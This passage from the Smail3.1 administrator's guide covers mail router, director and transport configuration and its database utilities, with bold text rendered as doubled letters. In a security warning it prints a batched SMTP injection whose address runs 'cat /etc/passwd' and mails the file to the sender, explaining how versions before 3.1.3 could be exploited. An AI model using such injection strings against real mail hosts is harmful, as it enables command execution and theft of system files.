s#sm#ma#ar#rt#t_#_u#us#se#er#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rder  of  entries in the director fi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in which operations are attempted.  If a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 an  address  then  no  other  directors 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expand or resolve  that  address.   A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is equivalent to the preloaded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liasinclude - expand ":include:filename"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produced by ali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aliasinclude,   # use this special-c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body;                  # associate nobody user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 when mild permission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secure,              # get permissions from alias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owners               # get owners from alias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orwardinclude - expand ":include:filename"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produced by forw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forwardinclude, # use this special-c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secure,              # get perms from forward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owners               # get owners from forward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liases - search for alias expansions store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aliasfile,      # general-purpose alias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obody,                 # all addresse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with nobody by default,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is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 = owner-$user;     # problems go to an own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/usr/lib/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ask = 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,                # ignore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 =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otforward - expand .forward files in user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forwardfile,    # general-purpose forward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 = Postmaster,      # problems go to the user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er_okay;             # sender never removed from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~/.forward,       # .forward file in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owner,              # the user can ow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s = root,           # or root can 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ask = 002,          # it should not be globally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 = daemon:root,   # don't run things as root o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be extra careful of remotely accessible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ecure = "~ftp:~uucp:~nuucp:/tmp:/usr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orwardto - expand a "Forward to " in user mailb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is emulates the V6/V7/System-V forwarding mechanism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line of forward addresses stored at the beginning of us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iles prefixed with the string "Forward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forwar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 = Postmaster, nobody, sender_ok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/usr/mail/${lc:user}, # the mailbox file fo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to,               # enable "Forward to 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owner,              # the user can ow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s = root,           # or root can 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ask = 0002,         # under System V, group mail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 = daemon:root    # don't run things as root o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ser - match users on the local host with delivery to thei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:                         driver = user;# driver to match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local        # local transport goes to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al_user - match usernames when prefixed with the string "real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is is useful for allowing an address which explicitly del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 user's mailbox file.  For example, errors in a .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expansion can be delivered here, or forwarding loo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ultiple machines can be resolved by using a real-usern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= "real-"         # for example, match real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lists - expand mailing lists stored in a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ailing lists can be created simply by creating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/usr/lib/smail/lis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:                        driver = forwar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,                 # flag all addresses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body,                  # and then associate the nobod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 = owner-$user;     # system V sites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o-$user, as owner-$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oo long for a 14-cha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map the name of the mailing lis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lists/${lc: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mart_user - a partially specified smartuser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config file attribute smart_user is defined as a st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s "$user@domain-gateway" then users not matched otherwi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nt off to the host "domain-gate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smart_user attribute is not defined, this direc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smartuser;      # special-c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do not match addresses which cannot be made in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FC822 local addresses without the use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_formed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2#2.#.2#2.#.  T#Th#he#e P#Pr#re#el#lo#oa#ad#de#ed#d R#Ro#ou#ut#te#er#r C#Co#on#nf#fi#ig#gu#u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  _#r_#o_#u_#t_#e_#r_#s  configuration file is not found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then the default  pre-loaded  configuration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router  configuration  supports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t_add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er will  match  hosts  specified  a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 enclosed  in  square  brackets. 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hosts is always performed using the s#sm#mt#tp#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scribed  in  a  later  section).   Any host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brackets that does not  match  the  form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address will be considered an error. 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 of an internet  address  is  [#[1#19#92#2.#.2#2.#.1#12#2.#.1#14#42#2]#]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er  is  only available on machines that support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t_ho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tch internet hostnames that can be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 the  _#g_#e_#t_#h_#o_#s_#t_#b_#y_#n_#a_#m_#e(3N) library routine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brary function will match any host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/_#e_#t_#c_#/_#h_#o_#s_#t_#s.   Deliveries  to  hosts  matched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er are always performed using  the  s#sm#mt#tp#p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scribed  in  a  later section).  This rou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machines that support BSD compatibl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h database is used to match hosts for which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nown.  Normally, this path database is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_#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l_#/_#p_#a_#t_#h_#s.   Often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generated from map files distributed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 newsgroup c#co#om#mp#p.#.m#ma#ai#il#l.#.m#ma#ap#ps#s, though path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 created  through  other  means.   A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 associates  a  path with specific host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.  A path is defined as a set of hostname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d by single exclamation points (`!'),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being followed by the string `%s'.  An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ple path database is a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urds.org  curds-vax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whey.edu   foo!whey-3b20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        foo!bar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         foo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path  in  this database specifi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s, from first to last, through which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pass to reach the host specified on the left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.  For  more  information  on  path  database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a_#t_#h_#a_#l_#i_#a_#s(8) and _#m_#k_#p_#a_#t_#h(8).  Depending upo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specified in  the  _#E_#D_#I_#T_#M_#E  configur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ath  file  may  need  to be sorted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a database created with the  _#d_#b_#m(3X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(see _#m_#k_#d_#b_#m(8) for information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atabases).  Delivery to hosts match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er  is  performed using the u#uu#ux#x transpor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_neighb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_#/_#u_#s_#r_#/_#b_#i_#n_#/_#u_#u_#n_#a_#m_#e is used to ob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s  that  the local host communicates with ov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_#u_#u_#c_#p(1)).  This router compares hostnames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and causes delivery to be perfor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#uu#ux#x transport whenever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_h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hostname is not matched by any other  means,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at  host can be sent to another mach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#sm#ma#ar#rt#th#ho#os#st#t router.  The path through which this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 can  be defined in a _#c_#o_#n_#f_#i_#g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s#sm#ma#ar#rt#t_#_p#pa#at#th#h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file line could be used to redirect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ghboring host _#a_#m_#d_#a_#h_#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_path = am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not set, then the s#sm#ma#ar#rt#t_#_u#us#se#er#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is ignored.  Delivery is performed using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named in the _#c_#o_#n_#f_#i_#g file variable s#sm#ma#ar#rt#t_#_t#tr#ra#an#ns#sp#po#or#rt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variable is not set then the u#uu#ux#x trans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entries in the router file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in  which  operations  are  attempted.   If  a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 hostname completely, then no other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 to resolve that host.  If a router matche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ly, as a domain in the right-hand side of  the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then  subsequent  routers  may also find ro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 which finds the best match, based on number of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matched, wins.  In the case of a tie, the router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t in the router file  wins.   A  router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preloaded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et_addrs and inet_hosts are only defined when BS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et_addrs - match domain literals containing literal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or example, [128.103.1.1] will match harvard.harvard.ed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ternet.  The library routine gethostbyaddr(3N) will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e if a reverse mapping to the canonical hostn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et_add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gethostbyaddr,  # router to match IP domain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smtp;        # deliver using SMTP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_if_error,           # fail malformed domain literal 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_for_local          # see if this is really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et_hosts - match hostnames with gethostbyname(3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et_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gethostbyname,  # match hosts with th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aths - route using a paths file, like tha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pathali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:                        driver = pathalias,# general-use paths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uux;         # for matches, deliver ov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paths,            # sorted file containing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 = bsearch,         # use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,                # ignore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= uucp            # strip ending ".uucp"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ucp_neighbors - match neighbors accessible ov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_neighb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uuname,         # use a program which returns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u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/usr/bin/uuname,   # specifically, use the uun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=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mart_host - a partially specified smarthos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config file attribute smart_path is defined as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local host to a remote host, then hostname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therwise will be sent off to the stated remote host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ile attribute smart_transport can be used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smart_path attribute is not defined, this rou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_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smarthost,      # special-c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uux          # by default deliver over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2#2.#.3#3.#.  T#Th#he#e P#Pr#re#el#lo#oa#ad#de#ed#d T#Tr#ra#an#ns#sp#po#or#rt#t C#Co#on#nf#fi#ig#gu#u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_#t_#r_#a_#n_#s_#p_#o_#r_#t_#s configuration file is not found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then the default  pre-loaded  configuration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transport configuration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 to users on the local machine.   Mailbo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cal users are generally found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/_#u_#s_#r_#/_#s_#p_#o_#o_#l_#/_#m_#a_#i_#l or under _#/_#u_#s_#r_#/_#m_#a_#i_#l, and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as the corresponding user.  To support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 available user interfaces,  such  as  _#M_#a_#i_#l(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a_#i_#l_#x(1),  certain transformations ar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Namely, a line containing the retur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ender and a time stamp is prepended to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, a blank line is appended at the end,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 with the word ``From'' will have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`&gt;' prepended to it.  An  example  o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prepended to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mdahl!futatsu!tron Mon Apr 18 16:11:13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addition,   a  ``Return-Path:''  header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which duplicates the  return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ddresses which begin with a vertical ba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(`|')  are  delivered  using  this  transpor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 name p#pi#ip#pe#e is reserved for this purpo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#pi#ip#pe#e transport executes a shell command by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_#/_#b_#i_#n_#/_#s_#h.  The message is pass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o this command.  The shell command is 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 the vertical bar character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ddress.  The alias  or  forward  addres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  the  pipe  command  address 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as "$ADD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ddresses which begin with a  slash  (`/')  o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de  character  (`~') are delivered using th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(the transport name f#fi#il#le#e is reserved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e).  The f#fi#il#le#e transport appends to a fil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local address  string.   If  the  loca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begins with a slash, then it identifies an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te path.  If the string begins  with  ``~_#u_#s_#e_#r_#n_#a_#m_#e_#/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this  substring is replaced by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iven user.  If the string  begins  simp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~/'',  then  this substring will be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 associated with  the  address;  e.g.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ddress in a user's _#~_#/_#._#f_#o_#r_#w_#a_#r_#d file will b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ted with that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#uu#ux#x transport is used as the normal form of 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y  over UUCP.  This transport will deliver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at a time by calling the  program  _#u_#u_#x(1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  mail  to the program _#r_#m_#a_#i_#l(1) on a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.  The request is queued, and actual deliv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ed  immediately.   To force an immedia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act the remote site, use the d#de#em#ma#an#nd#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#de#em#ma#an#nd#d transport is used  to  deliver  up  to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 at  a  time by calling the program _#u_#u_#x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 to a remote _#r_#m_#a_#i_#l(1) program.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#uu#ux#x  this transport forces an immediate attemp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ct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sm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#uu#us#sm#mt#tp#p transport is used to deliver  using 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TP over UUCP.  It will deliver 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ddresses by calling the program _#u_#u_#x(1)  to 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  remote _#r_#s_#m_#t_#p(1) program.  The request is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ctual delivery is not attemp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_uusm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ransport is used to deliver to an unlimited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  of  addresses  by  calling  the  program _#u_#u_#x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 to a remote _#r_#s_#m_#t_#p(1) program.   This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an immediate attempt to contact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ites that have  BSD  networking  faciliti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  is  available,  which  performs  deli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a TCP/IP virtual circuit to a remote  h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aging  in  an  interactive  SMTP dialogu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entries  in  the  transport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 unless  transport  entries  with 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  In this case, the transport earlier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 always used.  A transport file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loaded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local - deliver mail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By default, smail will append directly to user mail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:                        driver = appendfile,# append mess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_path,             # include a Return-Path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,                   # use local form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,     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_from_hack;          # insert &gt; before From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/usr/mail/${lc:user},# use this location fo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= mail,            # group to own file fo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= 0660,             # under System V, group mail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x = "0              # append an extr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ipe - deliver mail to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is is used implicitly when smail encounters address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 vertical bar character, such as "|/usr/lib/news/recnews talk.bizar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vertical bar is removed from the address before being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:                         driver = pipe,# pipe message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_path, local, from, unix_from_h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"/bin/sh -c $user",# send address to the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_env,              # environment info from paren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e_as_user,            # use user-id associated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ask = 0022,            # umask for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log_output              # do not log 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ile - deliver mail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is is used implicitly when smail encounters address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 slash or twiddle character, such as "/usr/info/list_messag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erhaps "~/Mail/in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                       driver = appen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_path, local, from, unix_from_h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$user,            # file is take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_as_user,          # use user-id associated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_user,             # expand ~ and $ with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x = "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= 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ux - deliver to the rmail program on a remote UUC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x: driver =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,                    # use UUCP-style address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,     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_addrs = 5,           # at most 5 addresses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_chars = 200;         # at most 200 chars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the -r flag prevents immediate delivery,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$user variable prevent special interpretation by u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"/usr/bin/uux - -r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ask = 0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mand - deliver to a remote rmail program, polling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and:                       driver =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, from, max_addrs = 5, max_chars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with no -r flag, try to contact remote si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"/usr/bin/uux -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ask = 0022, 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usmtp - deliver to the rsmtp program on a remote UUC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rsmtp program is assumed to to take batched SMT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smtp:                       driver =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mtp,                   # send batched SM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et,                    # use internet forms f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x_addrs,              # there is no limit on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x_chars;              #  total size of recipi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supply -r to prevent immediate delivery, the recipi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are stored in the data sent to the standard input of r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"/usr/bin/uux - -r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ask = 0022, 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mand_uusmtp - deliver to a remote rsmtp program, polling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and_uu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pipe, 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mtp, -max_addrs, -max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with no -r flag, try to contact remote si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"/usr/bin/uux -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ask = 0022, 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mtp - deliver using SMTP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nnect to a remote host using TCP/IP and initiate an SMTP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o deliver the message.  The smtp transport is included only if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networkin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NOTE:                       This is hardly optimal, a backend should exist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multiple messages p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LSO:                       It may be necessary to restrict max_addrs to 100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lower limit SMTP requires an implementation to hand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tp:                         driver =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x_add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x_chars, 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  E#Ex#xa#am#mp#pl#le#es#s o#of#f S#Sm#ma#ai#il#l R#Ru#un#n-#-t#ti#im#me#e C#Co#on#nf#fi#ig#gu#ur#r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ections give examples of  run-ti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s that can be used to extend smail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ays.  In general the examples do  not  conta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  configuration  files  and,  as  such,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 in to existing configuration fil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erging in new configuration file entries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der is important in the director and ro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examples shown here, along with other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 examples, can be found under the S#Sm#ma#ai#il#l3#3.#.1#1 sourc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_#s_#a_#m_#p_#l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1#1.#.  U#Us#si#in#ng#g M#Me#et#th#ho#o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the  present  time,  m#me#et#th#ho#od#d  files  (describ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m_#a_#i_#l(5))  can only be used in run-tim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files can be used to define the transport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er-host basis.  An example of a metho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lect the transport on a per-hos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UCP hosts to which mail should be delivered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       demand              # our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s12    demand              # internal machine, dedicat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Hosts to which mail should be delivered immedi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 non-interactive SMTP protocol over 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boy    demand_uusmtp       # gateway to su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Hosts to which mail should be queued with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MTP protocol over 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i     uusmtp              # experimental Smail3.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or other hosts, use normal (queued) uucp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uux                 # all othe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standard preloaded router entries could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to use this method file to select a  transport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allowing  only one transport per router. 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copy the router file corresponding to the pre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  found   in   the  Smail  source  file  _#s_#a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l_#e_#s_#/_#g_#e_#n_#e_#r_#i_#c_#/_#r_#o_#u_#t_#e_#r_#s, to the smail LIB_DIR  directory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y  _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l.   Remove the generic attribute t#tr#ra#an#ns#s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o#or#rt#t and add a generic attribute m#me#et#th#ho#od#d which poin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 methods  file.   As an example, let's change the p#pa#at#th#h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, described in the section _#T_#h_#e _#P_#r_#e_#l_#o_#a_#d_#e_#d  _#R_#o_#u_#t_#e_#r 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g_#u_#r_#a_#t_#i_#o_#n,  and  modify  it  to  use the method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moving the t#tr#ra#an#ns#sp#po#or#rt#t attribute and adding the m#me#et#th#ho#o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, the router file entry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aths - route using a paths file, like tha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athali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:    driver = pathalias, # general-use paths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= uucp;      # use "uucp" meth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paths,       # sorted file containing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 = bsearch,    # use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,      # ignore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= uucp       # strip ending ".uucp"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 that  the  values  for  the  _#c_#o_#n_#f_#i_#g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e#et#th#ho#od#d_#_d#di#ir#r   and   s#sm#ma#ai#il#l_#_l#li#ib#b_#_d#di#ir#r   are    ``methods''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/usr/lib/smail''  respectively, the above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method     file      stored      in      the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l_#i_#b_#/_#s_#m_#a_#i_#l_#/_#m_#e_#t_#h_#o_#d_#s_#/_#u_#u_#c_#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files  become  extremely  useful when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il to handle new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2#2.#.  U#Us#si#in#ng#g B#Ba#at#tc#ch#he#ed#d S#SM#MT#TP#P E#Ef#ff#fe#ec#ct#ti#iv#ve#el#l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ports u#uu#us#sm#mt#tp#p and d#de#em#ma#an#nd#d_#_u#uu#us#sm#mt#tp#p will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ain the versatility of the SMTP format, such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rbitrary  addresses,  including  address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characters or white space, and support for a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umber of  recipient  addresses  per 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pabilities are gained by putting an envelop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around the mail message and shipping the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  in one file.  As an example, a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ivered to ``cathy@foobar.uucp'' might be sen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O busboy.uts.amdah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FROM: &lt;@busboy.uts.amdahl.com:tron@futatsu.uts.amdah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PT TO: &lt;cathy@foobar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: by busboy.uts.amdahl.com id m0d98az-000gtZ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Jun 27 18:45 PD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: by futatsu.uts.amdahl.com id m0d98ax-0jaZi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Jun 27 18:43 PD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tron@futatsu.uts.amdahl.com (Ronald S. K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cathy@foobar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Hmmm.  It's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test of the Emergency Email  System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a  test.   For this and the next several li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nducting a test of the  networks  betwee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 and  your  machine.   This  test is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specific knowledge of the network  orga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  on  these networks, though with thei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had not  been  a  test,  you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ed  of  a  restaurant at which you should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to partake of foodstuffs in the comp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ne  beginning  with  ``HELO''  identifies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, and the line beginning with ``MAIL FROM:'' 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urn-path to the sender of the mail message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ipients may be  specified  by  giving  multipl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with  ``RCPT TO:''.  The ``DATA'' comm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tual  message  follows.   The  message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a  line  containing  only  a  signal  dot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the command ``QUIT'' signals the end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2#2.#.1#1.#.  B#Ba#at#tc#ch#hi#in#ng#g M#Mu#ul#lt#ti#ip#pl#le#e M#Me#es#ss#sa#ag#ge#es#s i#in#n O#On#ne#e S#SM#MT#TP#P T#Tr#ra#an#ns#sa#a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MTP  format allows multiple message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in one transaction by repeating everything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HELO'' and the ``QUIT'' commands (not including tho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themselves) to specify the envelope  and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gathering  multiple messages into one SMTP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transport of mail over UUCP can  be  made  more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.   This  reduces overhead in the UUCP protoc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umber of mailer invocations required for mail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y  on  the remote side.  Unfortunately, S#Sm#ma#ai#il#l3#3.#.1#1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message at a time, so it cannot, by itself,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-message transa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smail  can accumulate messages in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directory, using  the  a#ap#pp#pe#en#nd#df#fi#il#le#e  transport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a shell script or C program outside of s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batch jobs to be sent to the uux program.   For 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scription, we will do this as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somewhat difficult in a shell scrip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ocking primatives required to support the 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of messages into one file, so we will accumula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into a directory, one file per message,  and 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 these files together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we need to write a transport file ent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our needs.  It should write files  into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name  is  based  upon  the name of the remot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il should be delivered.  These files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SMTP  command envelope containing all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livery except for the HELO  and  QUIT  comman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ransport file entry will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ccumulate messages into a directory on a per-hos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_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the appendfile driver can also accumulate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=appen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smtp;        # half-baked BSMTP, no HELO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files whose names begin with `q' will be plac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=/usr/spool/smail/outq/${lc:h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=cronjobs, # files will be owned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=0600,     # and unreadable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writing  files  into  a directory, the a#ap#pp#pe#en#nd#d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irst writes the file to a  temporary  file,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eginning with ``temp.'' and then renames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eginning with the letter `q'.  Thus,  a  shell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ssume  that any file whose name begins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q' is in a consistent state.  The shell script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elivery, called _#b_#a_#t_#c_#h_#s_#m_#t_#p,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liver messages accumulated into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utq spool directory.  Subdirectory na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actual hostnam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Q=/usr/spool/smail/ou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X=/usr/bin/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HOST=busboy.uts.amdah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$OU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loop through all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in *; do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=q*        # get the list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[ "$list" = "*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no messag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0    # leave sub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send all of the files, adding HELO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cho "HELO $LOCAL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 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QUIT) | $UUX - $i!r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 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ipt  above  should be run from cron period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 users _#c_#r_#o_#n_#j_#o_#b or _#r_#o_#o_#t.  The execu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long enough that there will not be any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nstances of this script will run concurrently. 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ly,  the  script  could be changed to loop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above operations and then sleeping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of time, say half an hour.  This would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problems with accidental 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possible to send the files over  in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format.  This can substantially reduc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incurred in the transmission of data over  modem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 for greater usage of CPU time on both sides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on can be done by  creating  a  shell  scrip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end, called _#r_#c_#s_#m_#t_#p (for _#R_#e_#a_#d _#C_#o_#m_#p_#r_#e_#s_#s_#e_#d _#S_#M_#T_#P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ceive compressed batches of SMTP commands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o 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following line should be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rganiz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ocal/bin/compress -d | /bin/r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he _#b_#a_#t_#c_#h_#s_#m_#t_#p shell script should be modified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ell  script _#c_#b_#s_#m_#t_#p, so that the pipeline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x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compress all of the files, adding HELO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cho "HELO $LOCAL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 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QUIT) | $COMPRESS | $UUX - $i!r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shell variable COMPRESS should be the pat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program on your system.  If your sit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, it can be  obtained  from  a  number  of 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archives on the host u#uu#un#ne#et#t.#.u#uu#u.#.n#ne#e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3#3.#.  U#Us#si#in#ng#g t#th#he#e Q#Qu#ue#er#ry#yp#pr#ro#og#gr#ra#am#m R#Ro#ou#ut#te#er#r D#Dr#ri#iv#v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q#qu#ue#er#ry#yp#pr#ro#og#gr#ra#am#m router driver is handy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operations for which none  of  the  other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 are  suitable.  This calls upo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rou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q#qu#ue#er#ry#yp#pr#ro#og#gr#ra#am#m driver  performs  a  fork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for each new hostname, it should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ing wherever possible.  Writing a new  dri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 your needs is much more efficien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w amount of mail traffic, or if you  have  a  d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machine and do not mind the overhead, then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easonable.  To help out somewhat,  the  driv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 responses  so  that a list of routing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host will result in only one fork/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ple case of the use  of  the  q#qu#ue#er#ry#yp#pr#ro#og#gr#ra#am#m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 from  a  need  expressed by one of th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in the smail alpha testing program.  His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a very large number of UUCP neighbors, and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ing u#uu#un#na#am#me#e to obtain the contents of the entire _#S_#y_#s_#t_#e_#m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as  simply  too  great.  He wrote a command u#uu#ui#in#nf#fo#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a DBM database formed from  their  _#S_#y_#s_#t_#e_#m_#s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is  invoked  with the flag -#-q#q and a sit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return an exit status of 0 if  the  site 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  and 1 otherwise.  A simple router to us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se uuinfo to match neighboring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_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queryprogram,   # query a program for rou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uux;         # use this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"/usr/local/bin/uuinfo -q ${lc:host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=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only the status of neighbor  versu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 is obtained.  It is also possible to c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turns a path and a transport.  A simple  c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be handled more efficiently with a paths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file uses the following shell script, _#q_#u_#e_#r_#y_#._#s_#h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ro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hostname is passed as the first argument, write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ransport for each host that we match.  Alternately, no trans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utput if the defaul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"$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[*) # look for internet addresses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et=`echo "$1" | sed -n 's/^\[\([0-9.]*\)\]$/[\1]/p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[ "$inet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$inet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) echo foo uusmt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) echo foo!bar uusmt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ds)    echo curd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y)     echo curds!whey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)   echo foo!$1 uusmtp;; # send mail for unknown hosts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ell  script outputs a path, with hostnam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haracter `!', and may also write  out  a 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from the path by space and tab charact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literal internet addresses, stored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orwards mail for unknown hosts to the host ``foo'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 file entry which can make use of  this  shell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se query.sh to match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_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= queryprogram,        # query a program for rou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= uux;         # use this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"/bin/sh $smail_lib_dir/query.sh ${lc:host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= uucp, read_transport, read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try assumes that the _#q_#u_#e_#r_#y_#._#s_#h script is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as smail utilities and run-time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  files, normally _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l.  The shell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s an un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example can be used to  point  out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important:  security  is  difficult  to maintai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here shell scripts are executed as a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 from remote machines.  As it currently stand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bove can be used by a remote  site  to  exec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shell command on the local host, for sit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Smail previous to S#Sm#ma#ai#il#l3#3.#.1#1.#.3#3.   To  do  th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user  could send the following batched SMTP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O foo@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FROM:&lt;foo@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CT TO:&lt;dummy pipe!"`cat /etc/passwd | mail $SENDER`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me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here is  that  versions  of  smail  previ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m#ma#ai#il#l3#3.#.1#1.#.3#3  allow  whitespaces  in hostnames.  Thu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 address above, the  _#q_#u_#e_#r_#y_#._#s_#h  shell  scrip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invoked with a host of ``dummy pipe'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aused the shell script to retur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!dummy pipe uu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then  have  caused  the  p#pi#ip#pe#e  transpor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to run the she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my!"`cat /etc/passwd | mail $SENDER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in backquotes here would then cause you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returned to the ``foo@bar''. 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 in  the samples directory takes care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plicitly checking for whitespace in the hostname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of  Smail  starting  with Smail3.1.3 explicit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phanumeric characters, and a  small  set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(dot  (`.'),  dash (`-'), underscore (`_'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`+') and equal (`=')), in hostnames.   In  addition,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are  prohibited from beginning with a d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any characters are still allow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name begins with a lef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  B#Ba#as#si#ic#cs#s o#of#f U#Us#si#in#ng#g t#th#he#e S#Sm#ma#ai#il#l U#Ut#ti#il#li#it#ti#i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 a  fairly  large number of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included in the S#Sm#ma#ai#il#l3#3.#.1#1 release.   Mos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 useful in creating, maintain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hich can be used by smail for directing and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   These  database  manipulation  tools are laye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mall set of low-level utilities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databases in various formats, such as so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BM files (using the _#d_#b_#m(3X) library).  In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k#kl#li#in#ne#e  and  p#pa#at#th#ha#al#li#ia#as#s  tools  can be used in formatting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nd path data for use by the database creation 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 on  top of these lower level tools ar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tools such as  m#mk#ka#al#li#ia#as#se#es#s  and  m#mk#kp#pa#at#th#h,  which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of  these smail utilities ar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il library directory, which is normally _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s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1#1.#.  B#Bu#ui#il#ld#di#in#ng#g S#Si#im#mp#pl#le#e D#Da#at#ta#ab#b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databases, and _#d_#b_#m-based databases,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mail  directors  based  on  the  aliasfile driv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s based on the pathalias driver.  The fir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about  when  creating these databases is m#mk#kl#li#in#ne#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akes an alias file or path file  as  input, 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unnecessary white-space, and join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For example, given the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ampl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n@futatsu             # Ronald S. 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ngo@eek               # Landon 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:                         gam@woof# Gordon Mof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#mk#kl#li#in#ne#e command would produce, on its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master:tron@futatsu chongo@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:gam@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emoving comments and continuation  lines,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reate databases can read single lin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 databases  can be created using either the s#s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the smail m#mk#ks#so#or#rt#t utility.  M#Mk#ks#so#or#rt#t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ine  length  restrictions,  and  can  thu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and paths containing arbitrarily large record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require the ability to read all of its inpu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addition, some versions of the s#so#or#rt#t comm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 to  have  a bug related to the use of the -#-f#f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forming case-independent sorting.  To creat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the  alias file listed abo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line _#a_#l_#i_#a_#s_#f_#i_#l_#e | mksort -f &gt; _#a_#l_#i_#a_#s_#f_#i_#l_#e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_#a_#l_#i_#a_#s_#f_#i_#l_#e is  the  pathname  containing  th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he -#-f#f flag performs a sort in a cas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, as  required  for  the  smail  b#bs#se#ea#ar#rc#ch#h  fil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   This  command  line could also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paths file.  Smaller systems may wish to use s#so#or#rt#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 high  memory  usage,  or errors due to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Path files can b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M databases can be created using the  m#mk#kd#db#bm#m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reate  a  database  can  be  used by the smail d#db#bm#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 method,  for  aliasfile  directors   and  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s, use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line _#f_#i_#l_#e | mkdbm -f -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_#f_#i_#l_#e  is the source text for the database and _#n_#a_#m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for the DBM database.  This will create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.pag  and  _#n_#a_#m_#e.dir  containing the actual data.  The -#-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causes the keys to be converted to  lower  cas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 require  that you enter a com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have changed the primary  _#a_#l_#i_#a_#s_#e_#s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k#ka#al#li#ia#as#se#es#s  utility  exists  to do this for you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efined in the EDITME file  to  determin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liases  file  is  to  be built, and where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builds it for you.  For example,  if  your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 is   stored   as  a  DBM  file  with  a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l_#i_#b_#/_#a_#l_#i_#a_#s_#e_#s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ecute the she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line /usr/lib/aliases | mkdbm -f -v -o /usr/lib/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2#2.#.  B#Bu#ui#il#ld#di#in#ng#g P#Pa#at#th#h D#Da#at#ta#ab#b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often, the building of  path  databases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 than  taking  one  file  and  running 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line|mksort or a mkline|mkdbm pipeline.  Map data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 which  must  be processed by the p#pa#at#th#ha#al#li#ia#as#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paths.  As well, this map data can come from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y  of sources, both from map data published month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NET newsgroup c#co#om#mp#p.#.m#ma#ai#il#l.#.m#ma#ap#ps#s and  from  private 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as maps of local area networks, or a private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#mk#kp#pa#at#th#h utility is used to organize the path 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process.   It  takes  a  configuration file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ap files can be found, along with directives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 other  data,  and  feeds all of this to pathali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paths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configuration file for  mkpa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, _#w_#o_#r_#l_#d_#._#c_#o_#n_#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get the usenet worl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    /usr/spool/uu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map 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map u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erge in the new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    /usr/lib/smail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map newmap/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erge in our exter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`uuname -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    world.map private.map tweak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guration file above takes map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.  and _#u_#.  from the directory  _#/_#u_#s_#r_#/_#s_#p_#o_#o_#l_#/_#u_#u_#m_#a_#p_#s,  and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nder _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l_#/_#m_#a_#p_#s_#/_#n_#e_#w_#m_#a_#p.  These m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as input to pathalias, the name of the  local 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connectivity information that pathali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ed, and then the  files  _#w_#o_#r_#l_#d_#._#m_#a_#p,  _#p_#r_#i_#v_#a_#t_#e_#._#m_#a_#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w_#e_#a_#k_#._#m_#a_#p  are  sent  to pathalias.  The reason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host connectivity information is that  lin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host should not be determined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ps published by other sites.  After proc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,  a  sorted list of path file entries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output.  The above configuration file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reate a sorted paths fil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path world.conf &gt; world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mplete set of examples is distributed with s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rectory _#s_#a_#m_#p_#l_#e_#s_#/_#a_#m_#d_#a_#h_#l_#/_#m_#a_#p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3#3.#.  S#St#to#or#ri#in#ng#g a#an#nd#d D#Di#is#sp#pl#la#ay#yi#in#ng#g I#In#nf#fo#or#rm#ma#at#ti#io#on#n a#ab#bo#ou#ut#t H#Ho#os#s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#uu#uw#wh#ho#o command can be used by users or sit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ors  to get a listing of the map entry for a know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use of a database which is formed  by  the  m#mk#ku#uu#uw#wh#h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Mkuuwho takes a mkpath configuration file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s a database which associates each site  nam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map entry for that site.  The mkpath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 file is used only  for  determining  where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 configuration  file used above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#mk#kp#pa#at#th#h, the following command can be used to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uuwho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uuwho -u uuwho worl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create a DBM database, in the files _#u_#u_#w_#h_#o_#._#p_#a_#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u_#w_#h_#o_#._#d_#i_#r.  After the database is created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who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used to display a map ent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name:    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:    Foo Ba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ype:     pdp 11/45, v6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person:  Joe Stu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Address:   foobar!stu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:       +1 605 555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Address:  Foo Bar, Inc., Wall SD 57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/Lat:        44 00 43 N / 102 19 5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links:      namei glotz hoptoad kgbvax krem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upstrea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bar   glotz(HOURLY+LOW), namei(HOURLY+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downstrea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bar   kgbvax(HOURLY*4), kremvax(HOURLY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our alt.drug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bar   hoptoad(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4#4.#.  E#Ex#xt#tr#ra#ac#ct#ti#in#ng#g M#Ma#ap#ps#s F#Fr#ro#om#m U#US#SE#EN#N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#ge#et#tm#ma#ap#p utility can be used to extract  map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the   maps   published   in   the   USENET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p#p.#.m#ma#ai#il#l.#.m#ma#ap#ps#s.  To use this utility  with  netnew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,  for automated map extraction, first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o your news _#s_#y_#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s:comp.mail.maps,world:F:/usr/spool/uumaps/work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ne  will  cause   netnews   to   put   a   lin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s_#p_#o_#o_#l_#/_#u_#u_#m_#a_#p_#s_#/_#w_#o_#r_#k_#/_#b_#a_#t_#c_#h every time an articl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#co#om#mp#p.#.m#ma#ai#il#l.#.m#ma#ap#ps#s newsgroup.   This  lin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to the artic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ally,  the  g#ge#et#tm#ma#ap#p  utility  can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he _#b_#a_#t_#c_#h file, extracting any  map  data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received.  Getmap should be executed from cro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and  group  that  can  write  to  the  map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/_#u_#s_#r_#/_#s_#p_#o_#o_#l_#/_#u_#u_#m_#a_#p_#s.   It  will mail any error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o#os#st#tm#ma#as#st#te#er#r.  The period of  execution  should  pre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 of  any  map  data  as  a  result  of a artic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, but does not necessarily need to b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5#5.#.  S#Sm#ma#ai#il#l C#Cl#le#ea#an#nu#up#p U#Ut#ti#il#li#it#ti#i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iscussed  in  a  previous  section, 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h#he#ec#ck#ke#er#rr#r  and  s#sa#av#ve#el#lo#og#g  exist  to clean up after s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h#he#ec#ck#ke#er#rr#r  utility  checks  for  processing  errors,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 to  the  mail administrator whenever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#sa#av#ve#el#lo#og#g utility can be used to  perform  log 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ression, so that the filesystem containing the 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does not eventually fill up.  Both of  these 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s should be executed on a daily basis from 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#ge#et#tm#ma#ap#p utility also keeps a log of its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_#/_#u_#s_#r_#/_#s_#p_#o_#o_#l_#/_#u_#u_#m_#a_#p_#s_#/_#w_#o_#r_#k_#/_#g_#e_#t_#m_#a_#p_#._#l_#o_#g.   Si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utility to extract maps from USENET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a#av#ve#el#lo#og#g utility to truncate and compress this log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should not grow very quickly, so a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savelog command on a monthly basis is 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since this is the period over which ma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